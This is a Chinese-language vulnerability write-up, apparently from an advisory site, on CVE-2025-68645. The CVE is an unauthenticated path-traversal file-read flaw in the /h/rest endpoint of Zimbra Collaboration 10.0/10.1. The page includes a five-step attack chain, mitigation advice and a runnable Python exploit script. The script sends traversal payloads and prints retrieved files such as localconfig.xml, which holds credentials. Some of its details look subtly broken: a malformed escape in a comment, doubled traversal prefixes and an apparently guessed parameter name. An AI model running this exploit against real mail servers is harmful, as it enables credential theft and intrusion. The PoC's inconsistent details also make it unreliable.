CVE-2025-68645 Zimbra Collaboration 本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-68645

漏洞类型

本地文件包含(LFI)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Zimbra Collaboration (ZCS) 10.0, Zimbra Collaboration (ZCS) 10.1

漏洞概述

CVE-2025-68645是Zimbra Collaboration Suite (ZCS) 10.0和10.1版本中存在的一个高危本地文件包含(Local File Inclusion, LFI)漏洞。该漏洞位于Webmail Classic UI的RestFilter servlet中，由于对用户提供的请求参数处理不当，导致未经身份验证的远程攻击者可以通过向/h/rest端点发送精心构造的请求，影响内部请求调度机制，从而实现对WebRoot目录下任意文件的读取。Zimbra是一款广泛使用的企业级电子邮件和协作平台，因此该漏洞对大量企业用户构成严重安全威胁。攻击者利用此漏洞可以读取服务器上的敏感配置文件、凭据文件、系统日志等关键信息，可能导致进一步的内网横向渗透和数据泄露。由于该漏洞无需认证即可利用，且CVSS评分达到8.8，属于高危漏洞，建议受影响用户尽快采取修复措施。

技术细节

该LFI漏洞源于RestFilter servlet对请求参数的不当处理。在Zimbra的Webmail Classic UI中，RestFilter被设计用于处理RESTful请求并将其路由到相应的处理程序。然而，由于缺乏充分的输入验证，攻击者可以通过在请求参数中注入路径遍历序列(如../)来操控文件包含逻辑。具体来说，攻击者向/h/rest端点发送包含特定参数的请求，这些参数会被传递给文件包含函数，由于缺少正确的路径规范化检查，攻击者可以突破WebRoot目录限制，读取服务器上的任意文件。Zimbra的WebRoot目录通常包含应用程序配置、数据库连接信息、SSL证书、用户邮件数据等敏感资源。攻击者常利用此漏洞读取Zimbra配置文件(如localconfig.xml)获取数据库凭据，或读取邮件存储路径下的用户通信内容。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标Zimbra服务器版本，确认其为10.0或10.1版本，并确定Webmail Classic UI可访问

STEP 2

步骤2: 构造恶意请求

攻击者构造包含路径遍历序列的HTTP请求，针对/h/rest端点，使用../序列操控文件包含路径

STEP 3

步骤3: 发送LFI payload

通过GET参数传递精心构造的path参数，如../../../../jetty/webroot/zimbra/conf/localconfig.xml，触发文件包含

STEP 4

步骤4: 读取敏感文件

成功包含目标文件后，攻击者获取配置文件内容，可能包含数据库凭据、API密钥、SSL证书等敏感信息

STEP 5

步骤5: 横向移动或数据窃取

利用获取的凭据进一步渗透内网，访问用户邮件、联系人、日历等敏感数据，或获取更高权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-68645 Zimbra LFI PoC
# Target: Zimbra Collaboration Suite 10.0/10.1
# Endpoint: /h/rest

def exploit_lfi(target_url, file_path):
    """
    Exploit Local File Inclusion in Zimbra RestFilter servlet
    Args:
        target_url: Base URL of vulnerable Zimbra instance
        file_path: Path to file to read (relative to WebRoot)
    """
    # Encode path traversal to read arbitrary files
    # Common target: ../../../jetty/webroot/zimbra/\u00config\u00localconfig.xml
    
    endpoint = f"{target_url.rstrip('/')}/h/rest"
    
    # LFI payload using path traversal
    params = {
        'path': f'../../../../{file_path}',
        'content_type': 'json'
    }
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Accept': '*/*'
    }
    
    try:
        print(f"[*] Targeting: {endpoint}")
        print(f"[*] Attempting to read: {file_path}")
        
        response = requests.get(endpoint, params=params, headers=headers, timeout=30)
        
        if response.status_code == 200:
            print(f"[+] Success! File content retrieved:")
            print(response.text[:2000])  # Print first 2000 chars
            return True
        else:
            print(f"[-] Failed with status code: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-68645.py <target_url> <file_path>")
        print("Example: python cve-2025-68645.py https://mail.example.com ../../jetty/webroot/zimbra/conf/localconfig.xml")
        sys.exit(1)
    
    target = sys.argv[1]
    file_path = sys.argv[2]
    exploit_lfi(target, file_path)

影响范围

Zimbra Collaboration Suite (ZCS) 10.0

Zimbra Collaboration Suite (ZCS) 10.1

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 通过Web应用防火墙(WAF)规则阻止包含../序列的请求；2) 限制对/h/rest端点的访问，仅允许受信任的IP访问；3) 临时禁用Webmail Classic UI，改用现代UI；4) 加强对WebRoot目录下敏感文件的访问权限控制；5) 监控日志中的异常请求模式，及时发现潜在攻击行为。建议尽快升级到官方发布的安全版本以彻底消除该漏洞风险。